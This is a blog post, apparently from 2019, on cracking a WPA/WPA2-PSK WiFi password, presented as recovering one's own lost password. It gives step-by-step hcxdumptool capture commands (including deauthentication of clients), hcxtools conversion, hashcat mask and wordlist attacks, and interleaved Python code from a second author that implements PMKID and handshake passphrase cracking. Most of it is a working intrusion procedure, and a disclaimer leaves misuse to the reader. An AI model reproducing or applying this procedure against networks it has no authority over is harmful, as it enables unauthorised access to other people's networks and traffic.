Offensive

WiFi Access Retrieval

Recently I have been clumsy enough to lose the password to the shared WiFi. Unfortunately, as I did not get any means to retrieve it and had no access to the router, I had to get into it differently.

Disclaimer: You can use this knowledge for good things or bad things. In this blog post, we are speaking about retrieving access to your network. If you decide to use that knowledge for other purposes, this is merely your decision.

Today we are going to see one way to get back into a WPA/WPA2-PSK WiFi network when you have lost its password (it does not apply to WPA3-SAE or to enterprise networks using 802.1X). There are many other ways; this one works well because the data needed for the attack, a PMKID or a 4-way handshake, is quick to capture, and everything after that is an offline brute force on your own machine.

For this article, we are going to need: hcxdumptool (to capture), hcxtools (to convert the capture into hashcat's formats), hashcat (to crack) and a WiFi adapter whose driver supports monitor mode.

Introduction

We mainly use two tools, hcxdumptool and hashcat (hcxtools sits between them to convert the capture into hashcat's file formats). hcxdumptool captures 802.11 frames; from those frames we extract values derived from the network's Pairwise Master Key (PMK), and hashcat tries candidate passphrases against them.

The first way to obtain such a value is to capture a client joining the access point. The WPA/WPA2 key exchange is a 4-way handshake of EAPOL frames with a known structure: the frames after the first carry a MIC computed with a key derived from the PMK, the two nonces and the two MAC addresses, and everything except the PMK is visible in the capture.

The alternative is the optional RSN (Robust Security Network) PMKID field. The access point may put it in the first handshake frame as soon as a station associates, and hcxdumptool plays that station itself, so no legitimate client needs to be around.

The PMKID (Pairwise Master Key Identifier) is an HMAC-SHA1, keyed with the PMK, over the string "PMK Name" followed by the access point and station MAC addresses, truncated to 128 bits. That is exactly what we want: a value that can be recomputed from a PMK guess.

In both cases the hash cannot be reversed. Instead, for every candidate passphrase we derive the PMK (PBKDF2-HMAC-SHA1 over the passphrase, with the network name as salt, 4096 iterations), recompute the PMKID or the MIC, and compare it with the captured one. When they match, we have found the passphrase and can join the network.

None of these attempts go to the router: the brute force runs locally on the captured data, so the router is not affected by it. The capture phase is not passive, though. hcxdumptool transmits (association requests to obtain PMKIDs, deauthentication frames to make clients redo their handshake), which every access point in range will see.
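As an added example (my code, not the post's nor hcxdumptool's or hashcat's), here is the derivation above in Python, used to test a list of candidate passphrases against a PMKID and against a 4-way handshake the way hashcat modes 16800 and 2500 do. It assumes WPA2 with the AES-CCMP key descriptor (version 2, HMAC-SHA1 MIC; WPA1/TKIP uses HMAC-MD5 instead). The SSID, passphrase, MAC addresses, nonces and EAPOL frame are constructed sample values, not a capture.

```python
"""Check candidate passphrases offline against a WPA2-PSK PMKID and against a
captured 4-way handshake (EAPOL message 2 MIC).

Added example for this post: not code from the article, hcxdumptool or hashcat.
Every SSID, passphrase, MAC, nonce and frame below is a constructed sample.
"""
import hashlib
import hmac
import struct

EAPOL_MIC_OFFSET = 4 + 77  # EAPOL header (4 bytes) + key-descriptor fields before the MIC (77)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i PMK: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This is the slow step hashcat repeats for every candidate."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = first 128 bits of HMAC-SHA1(PMK, "PMK Name" || AP MAC || STA MAC).
    Both MACs are in the captured frame, so a PMK guess can be checked directly."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def kck_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512; the first 16 bytes of the PTK are the KCK that keys the handshake MIC."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return ptk[:16]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1-128 over the whole EAPOL frame
    with its 16 MIC bytes zeroed."""
    zeroed = eapol_frame[:EAPOL_MIC_OFFSET] + b"\x00" * 16 + eapol_frame[EAPOL_MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_m2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal EAPOL-Key message 2 (RSN descriptor, empty key data), constructed for the demo."""
    key_info = 0x010A  # MIC bit set, pairwise key, descriptor version 2
    body = struct.pack(">BHHQ", 2, key_info, 16, 1)            # type RSN, key info, key length, replay counter
    body += snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # nonce, key IV, key RSC, key ID
    body += mic + struct.pack(">H", 0)                          # MIC, key data length
    return struct.pack(">BBH", 2, 3, len(body)) + body          # EAPOL version 2, type 3 = EAPOL-Key


def crack_pmkid(target: bytes, ssid: str, ap_mac: bytes, sta_mac: bytes, candidates):
    """Return the first candidate whose PMKID matches, else None (what hashcat mode 16800 does)."""
    for cand in candidates:
        if hmac.compare_digest(pmkid(pmk_from_passphrase(cand, ssid), ap_mac, sta_mac), target):
            return cand
    return None


def crack_handshake(ssid: str, ap_mac: bytes, sta_mac: bytes, anonce: bytes, eapol_m2: bytes, candidates):
    """Return the first candidate that reproduces the MIC of message 2, else None (mode 2500).
    SNonce and MIC are read out of the frame; ANonce comes from message 1."""
    snonce = eapol_m2[17:49]
    target = eapol_m2[EAPOL_MIC_OFFSET:EAPOL_MIC_OFFSET + 16]
    for cand in candidates:
        kck = kck_from_pmk(pmk_from_passphrase(cand, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, eapol_m2), target):
            return cand
    return None


# Constructed sample network (the real passphrase is of course unknown to the attacker).
SSID = "HomeNet"
PASSPHRASE = "s3cr3t-passphrase"
AP_MAC = bytes.fromhex("021122334455")
STA_MAC = bytes.fromhex("02aabbccddee")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
CANDIDATES = ["password", "ibiza131", "s3cr3t-passphrase", "letmein1"]


def sample_pmkid() -> bytes:
    """What the access point would put in message 1 for this network and client."""
    return pmkid(pmk_from_passphrase(PASSPHRASE, SSID), AP_MAC, STA_MAC)


def sample_m2() -> bytes:
    """Message 2 as a legitimate client would send it: MIC computed with the real passphrase."""
    kck = kck_from_pmk(pmk_from_passphrase(PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return build_eapol_m2(SNONCE, eapol_mic(kck, build_eapol_m2(SNONCE)))


if __name__ == "__main__":
    print("PMKID hit    :", crack_pmkid(sample_pmkid(), SSID, AP_MAC, STA_MAC, CANDIDATES))
    print("handshake hit:", crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, sample_m2(), CANDIDATES))
```

Running it prints the passphrase found by each method. The expensive part is pbkdf2_hmac, 4096 SHA1 iterations per candidate, which is why hashcat's speed on these modes is measured in thousands rather than billions of hashes per second.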

Installation

I am used to keeping the source code of software I work with, and that the system does not need in order to run, in the /opt/ folder; feel free to do the following in another folder, like your home folder, if you prefer.

# Move to the folder you want to keep the sources in
# (/opt/ is usually root-owned: chown it to your user first, or clone with sudo).
cd /opt/
# Retrieve the source code of the tools we need.
git clone https://github.com/ZerBea/hcxdumptool
git clone https://github.com/hashcat/hashcat
git clone https://github.com/ZerBea/hcxtools.git
# Build and install them. Each project's README lists its build dependencies
# (a C compiler and make; hcxtools also wanted the OpenSSL, zlib and libcurl development headers).
(cd hcxdumptool/ && make && sudo make install)
(cd hashcat/ && make && sudo make install)
(cd hcxtools/ && make && sudo make install)

Congratulations, you are now equipped to try to get into any WiFi network, but of course we are only going to use this on a network we own.

Preparing the network interface

We need to prepare the network interface to monitor the network and be used by hcxdumptool.

During this phase you will lose internet. This blog is a PWA (Progressive Web App) and its content should remain accessible offline, so if you get lost, come back here!

First, let's find your WiFi interface (ifconfig is deprecated on many distributions; ip link show or iw dev gives the same information):

ifconfig |grep wl
wlp1s0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500

Here we can see that the interface is named wlp1s0.

Next, check whether other software will interfere with the card: NetworkManager and wpa_supplicant keep reconfiguring the interface behind your back. Just run hcxdumptool on it:

sudo hcxdumptool -i wlp1s0

If you see lines similar to:

initialization...
warning: NetworkManager is running with pid 19085
warning: wpa_supplicant is running with pid 19012

You need to deactivate the services, in my case:

sudo service wpa_supplicant stop
sudo service NetworkManager stop

Now we put the card in monitor mode. The driver has to support it: iw list shows monitor under Supported interface modes, and if it is missing you need another adapter. iwconfig belongs to the deprecated wireless-tools package; iw dev wlp1s0 set type monitor does the same job with the current tool.

## Set interface down, switch the mode, bring it back up
sudo ip link set wlp1s0 down
sudo iwconfig wlp1s0 mode monitor
sudo ip link set wlp1s0 up

From now on you no longer have internet. If at any moment you want to stop the procedure and restore the card to its normal state without rebooting, simply run:

sudo ip link set wlp1s0 down
sudo iwconfig wlp1s0 mode managed
sudo ip link set wlp1s0 up
sudo service wpa_supplicant start
sudo service NetworkManager start

Getting the password

Now we capture the packets we need and then run the brute force. These operations leave a few files behind, so I recommend moving to the /tmp/ folder (it is usually emptied at reboot; copy the capture elsewhere if you want to keep it).

cd /tmp/

Let's capture packets. The capture can be filtered, but here we listen on all channels and do the filtering afterwards.

If you know which channel the network is on, give it with the -c option. That is faster and, more importantly, keeps hcxdumptool from poking at every access point in range; its filter list (the FILTERLIST line in the banner below, see hcxdumptool --help) restricts it further to the access point you own.

To look at the surrounding networks and their channels, run:

sudo hcxdumptool -i wlp1s0 --do_rcascan

And then:

# Fullspectrum
sudo hcxdumptool -o capture.pcapng -i wlp1s0
# Knowing the network is on channel 10
sudo hcxdumptool -o capture.pcapng -i wlp1s0 -c 10

You should see something like:

initialization...

start capturing (stop with ctrl+c)
INTERFACE................: wlp1s0
ERRORMAX.................: 100 errors
FILTERLIST...............: 0 entries
MAC CLIENT...............: e8041029998e
MAC ACCESS POINT.........: 000eef9848db (incremented on every new client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 64629
ANONCE...................: 5128b8228c2be3c383be6615f4b81f01d168bda5389f3b74329c97cf1fa6baef

INFO: cha=11, rx=2642, rx(dropped)=1533, tx=245, powned=3, err=0

Here the important information is the powned=3 value: hcxdumptool obtained usable material (a PMKID or a handshake) from three access points. The counter does not say which ones, so the next step checks for your own network by name. The tx count shows that the tool has been transmitting, and cha is the channel it is on at that moment.

Let's have a cup of tea for the next 10 minutes, then press ctrl+c to stop the capture, as the banner says.

Once done, we extract from the capture the material usable for cracking the password.

sudo hcxpcaptool capture.pcapng -z capture.16800 -o capture.2500 --network-out=network_hash_name

-z writes the PMKIDs in hashcat's 16800 format (one line per PMKID: PMKID*MAC_AP*MAC_STA*ESSID, the ESSID in hex) and -o writes the 4-way handshakes as an hccapx file for mode 2500; --network-out lists which PMKID belongs to which network name. These options are the ones of the 2019 releases: newer hcxtools replaced hcxpcaptool with hcxpcapngtool, which writes a single file for hashcat mode 22000 covering both PMKIDs and handshakes, so check the --help of the version you built.

This produces three files: capture.16800 (PMKIDs), capture.2500 (handshakes) and network_hash_name (PMKID to network name).

To know if the network you want the password for is attackable with what you captured, there are two checks:

First, check whether the network name appears in the capture.2500 file, i.e. whether a handshake was captured:

wlanhcxinfo -i capture.2500  -a -s -e| grep -a <name of the network>

Second, if you did not find your network there, look at network_hash_name and check whether the hash it lists for your network is in the capture.16800 file.

For example:

cat network_hash_name

This prints lines of the form hash:network name. If the hash next to your network is in capture.16800, the PMKID attack will work against it.

The easiest way to check without straining your eyes:

cat capture.16800|grep <hash>

If it is there, congratulations: run the brute force and flex your GPU. If not, the PMKID method is probably not possible for this access point (not every access point sends a PMKID), and the only option is to run hcxdumptool longer and wait for a client to connect so that a handshake is captured.
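An added example (mine, not the post's nor hcxtools'): the same two checks done by parsing the files rather than eyeballing grep output. It assumes the 16800 line format PMKID*MAC_AP*MAC_STA*ESSID-in-hex written by hcxpcaptool -z, and it takes the post's description of network_hash_name ("hash:network name") to mean PMKID:ESSID, which is an assumption; both file contents below are constructed samples.

```python
"""Parse the files hcxpcaptool writes and answer: is there a PMKID for my network?

Added example for this post, not code from the article or from hcxtools/hashcat.
SAMPLE_16800 and SAMPLE_NETWORK_HASH_NAME are constructed sample file contents;
the "hash:network name" layout of the second file is taken from the post's
description and assumed to be PMKID:ESSID.
"""
from collections import defaultdict

SAMPLE_16800 = """\
6f3c9a1e2b7d4c5a8e9f0b1c2d3e4f50*021122334455*02aabbccddee*486f6d654e6574
a1b2c3d4e5f60718293a4b5c6d7e8f90*021122334455*02aabbccdd01*486f6d654e6574
0123456789abcdef0123456789abcdef*02c0ffee0001*02deadbeef02*4e65696768626f7572
this line is not a 16800 record and must be skipped
"""

SAMPLE_NETWORK_HASH_NAME = """\
6f3c9a1e2b7d4c5a8e9f0b1c2d3e4f50:HomeNet
a1b2c3d4e5f60718293a4b5c6d7e8f90:HomeNet
0123456789abcdef0123456789abcdef:Neighbour
"""


def essid_hex(name: str) -> str:
    """The hex spelling of an ESSID, i.e. the string to grep for in capture.16800."""
    return name.encode("utf-8").hex()


def parse_16800(text: str):
    """Yield (pmkid, ap_mac, sta_mac, essid) per line; malformed lines are skipped."""
    for line in text.splitlines():
        parts = line.strip().split("*")
        if len(parts) != 4:
            continue
        pmkid_hex, ap_mac, sta_mac, essid_h = (p.lower() for p in parts)
        try:
            essid = bytes.fromhex(essid_h).decode("utf-8", errors="replace")
        except ValueError:
            continue
        yield pmkid_hex, ap_mac, sta_mac, essid


def pmkids_for(text: str, network_name: str) -> list:
    """Exact match on the decoded ESSID (a grep on a substring can also hit other networks)."""
    return [rec for rec in parse_16800(text) if rec[3] == network_name]


def networks_summary(text: str) -> dict:
    """ESSID -> number of distinct PMKIDs, one per (AP, client) pair hcxdumptool obtained."""
    seen = defaultdict(set)
    for pmkid_hex, ap_mac, sta_mac, essid in parse_16800(text):
        seen[essid].add(pmkid_hex)
    return {essid: len(ids) for essid, ids in seen.items()}


def hashes_for_network(mapping_text: str, network_name: str) -> list:
    """Hashes that network_hash_name lists for a name, to cross-check against capture.16800."""
    out = []
    for line in mapping_text.splitlines():
        h, sep, name = line.strip().partition(":")
        if sep and name == network_name:
            out.append(h.lower())
    return out


def attackable_via_pmkid(network_name: str, capture_text: str, mapping_text: str) -> bool:
    """The post's second check: a hash listed for the network is present in capture.16800."""
    captured = {rec[0] for rec in parse_16800(capture_text)}
    return any(h in captured for h in hashes_for_network(mapping_text, network_name))


if __name__ == "__main__":
    print(networks_summary(SAMPLE_16800))
    print("grep for:", essid_hex("HomeNet"))
    print("HomeNet attackable:", attackable_via_pmkid("HomeNet", SAMPLE_16800, SAMPLE_NETWORK_HASH_NAME))
```

Matching on the decoded name rather than grepping is worth it when a neighbour's network name contains yours as a substring; essid_hex gives you the exact pattern if you prefer to stay with grep.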

If, like me, you have an Android phone with the WiFi password saved (but not retrievable, thank you Android), connect it during the capture: it will speed up the process significantly.

Unfortunately, I only have a laptop with an Intel GPU, so the process is slow. Intel GPUs and OpenCL also have their troubles, and if you are in the same situation, you are going to have to relax some of hashcat's safety checks (sounds fun, doesn't it?).

WARNING: If you get a message about the self-test failing with an Intel GPU/CPU, install the Intel OpenCL runtime. Do not disable the self-test (--self-test-disable): the run will finish without any result. The --force in the commands below makes hashcat ignore such warnings; keep it for this case only, since a kernel that failed its self-test can silently produce wrong results.

To install the Intel compute runtime, here are the instructions from its release page (the versions below are the ones current at the time of writing; take the latest release):

mkdir neo
cd neo
wget https://github.com/intel/compute-runtime/releases/download/19.29.13530/intel-gmmlib_19.2.3_amd64.deb
wget https://github.com/intel/compute-runtime/releases/download/19.29.13530/intel-igc-core_1.0.10-2306_amd64.deb
wget https://github.com/intel/compute-runtime/releases/download/19.29.13530/intel-igc-opencl_1.0.10-2306_amd64.deb
wget https://github.com/intel/compute-runtime/releases/download/19.29.13530/intel-opencl_19.29.13530_amd64.deb
wget https://github.com/intel/compute-runtime/releases/download/19.29.13530/intel-ocloc_19.29.13530_amd64.deb
sudo dpkg -i *.deb

In my specific case, I recalled the start of the password, so I used a brute force approach trying digits after ibiza131...

Now based on which file contains your network:

# 2500
hashcat -m 2500 -a 3 capture.2500 ibiza131?d?d?d --force --increment
# 16800
hashcat -m 16800 -a 3 capture.16800 ibiza131?d?d?d --force --increment

Here ?d means one digit (?l is a lowercase letter, ?u uppercase, ?s a special character, ?a any printable ASCII character) and -a 3 selects hashcat's mask attack. --increment makes hashcat try the mask at increasing lengths, adding one position after exhausting the previous one. Remember that a WPA passphrase is 8 to 63 characters long, so shorter candidates are wasted work.

You will see something resembling:

Session..........: hashcat
Status...........: Exhausted
Hash.Name........: WPA-EAPOL-PBKDF2
Hash.Target......: capture.2500
Time.Started.....: Tue Jul 30 01:05:07 2019 (18 secs)
Time.Estimated...: Tue Jul 30 01:05:25 2019 (0 secs)
Guess.Mask.......: ibiza131?d?d?d?d?d [13]
Guess.Queue......: 6/7 (85.71%)
Speed.#1.........:     5435 H/s (0.29ms) @ Accel:16 Loops:4 Thr:256 Vec:1
Recovered........: 1/2 (50.00%) Digests, 1/2 (50.00%) Salts
Progress.........: 200000/200000 (100.00%)
Rejected.........: 0/200000 (0.00%)
Restore.Point....: 100000/100000 (100.00%)
Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:0-1
Candidates.#1....: ibiza13134373 -> ibiza13173737

Here Recovered shows that one of the two hashes in the file has been cracked.

You can read the recovered password in hashcat's potfile, or re-run the same hashcat command with --show:

cat ~/.hashcat/hashcat.potfile

If I had not remembered the password at all, I could have run a pure brute force of the type:

# 2500
hashcat -m 2500 -a 3 capture.2500 ?a?a?a?a?a?a?a?a?a?a?a?a?a?a?a --force --increment
# 16800
hashcat -m 16800 -a 3 capture.16800 ?a?a?a?a?a?a?a?a?a?a?a?a?a?a?a --force --increment
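An added example, mine rather than hashcat's, for the two mask attacks above: it expands a mask with hashcat's built-in charsets, applies --increment, and sizes the keyspace so you can see why ibiza131?d?d?d is done in seconds while fifteen ?a positions is hopeless. The 8-character lower bound is a choice made here because WPA passphrases are 8 to 63 characters; it is not a hashcat option, and the candidate ordering is only an approximation of hashcat's.

```python
"""hashcat masks: what ?d / ?a mean, what --increment adds, and how big the keyspace gets.

Added example for this post; an independent re-implementation, not hashcat's code.
The WPA_MIN_LEN lower bound is a design choice here (WPA-PSK passphrases are 8..63
characters), not a hashcat flag.
"""
import itertools
import string

# hashcat's built-in charsets
CHARSETS = {
    "l": string.ascii_lowercase,      # 26
    "u": string.ascii_uppercase,      # 26
    "d": string.digits,               # 10
    "s": " " + string.punctuation,    # 33: space plus the 32 ASCII punctuation marks
}
CHARSETS["a"] = CHARSETS["l"] + CHARSETS["u"] + CHARSETS["d"] + CHARSETS["s"]  # 95

WPA_MIN_LEN = 8


def parse_mask(mask: str) -> list:
    """One alphabet per position; a literal character is a one-element alphabet."""
    positions = []
    i = 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            tag = mask[i + 1]
            if tag == "?":
                positions.append("?")          # "??" is a literal question mark
            elif tag in CHARSETS:
                positions.append(CHARSETS[tag])
            else:
                raise ValueError(f"unknown charset ?{tag}")
            i += 2
        else:
            positions.append(mask[i])
            i += 1
    return positions


def _lengths(positions: list, increment: bool, min_len: int) -> list:
    """Mask lengths to try: the full mask, or every length from min_len up with --increment."""
    full = len(positions)
    return list(range(min_len, full + 1)) if increment else [full]


def keyspace(mask: str, increment: bool = False, min_len: int = WPA_MIN_LEN) -> int:
    """Number of candidates the mask produces (summed over all lengths with --increment)."""
    positions = parse_mask(mask)
    total = 0
    for n in _lengths(positions, increment, min_len):
        size = 1
        for alphabet in positions[:n]:
            size *= len(alphabet)
        total += size
    return total


def candidates(mask: str, increment: bool = False, min_len: int = WPA_MIN_LEN):
    """Yield the candidates; the last position varies fastest."""
    positions = parse_mask(mask)
    for n in _lengths(positions, increment, min_len):
        for combo in itertools.product(*positions[:n]):
            yield "".join(combo)


def seconds_needed(count: int, rate_per_second: float) -> float:
    """Worst-case time to exhaust `count` candidates (the post's laptop did about 5435 H/s)."""
    return count / rate_per_second


if __name__ == "__main__":
    for mask in ("ibiza131?d?d?d", "?a" * 8, "?a" * 15):
        n = keyspace(mask, increment=True)
        print(f"{mask}: {n} candidates, {seconds_needed(n, 5435) / 86400:.3g} days at 5435 H/s")
```

At the post's 5435 H/s the incremented ibiza131 mask (1111 candidates) is a fraction of a second, eight ?a positions (95^8) is already decades, and fifteen is astronomically beyond that, which is why the next paragraph suggests a wordlist instead.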

In that case a dictionary attack is the realistic option: ?a covers 95 characters, so 15 positions are 95^15 candidates, which will never finish at a few thousand hashes per second.

# 2500
hashcat -m 2500 -a 0 capture.2500  --force  my_list_of_passwords
# 16800
hashcat -m 16800 -a 0 capture.16800  --force my_list_of_passwords

You can find many lists of passwords here.

Okay, that's all folks. Now that I have internet back, I can post this article. Peace out!

By PXke, 28/07/2019. Tags: Offensive, WiFi, Retrieval. Updated: 28/07/2019